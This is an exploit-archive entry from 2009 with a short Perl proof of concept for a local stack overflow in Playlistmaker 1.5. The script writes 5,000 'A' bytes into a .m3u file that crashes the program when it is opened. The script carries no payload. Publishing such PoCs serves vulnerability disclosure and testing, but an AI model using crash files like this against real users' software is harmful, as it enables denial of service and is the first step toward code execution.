id: 6908
date: 07/10/2009
title: Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC
author: ThE g0bL!N
cves: 

==============================================================
Playlistmaker 1.5 (.M3U/M3L/TXT File) Local Stack Overflow PoC
==============================================================


#!/usr/bin/perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   Playlistmaker v1.5   (.M3U/M3L/Txt File) Local Stack Overflow POC        ##
# #  Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html        ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $crash="\x41" x 5000 ;
open(myfile,'>>PoC.m3u');# M3U/M3L/Txt
print myfile $crash;
##################################################################################
#By ThE g0bL!N
#Usgae:open existing Plylis => Poc.m3u => Click On file => Boom!!!
# Ismail Fiha seh :) Mada Bik Anta 1st Thotha :)
##################################################################################




#  0day.today [2023-03-24]  #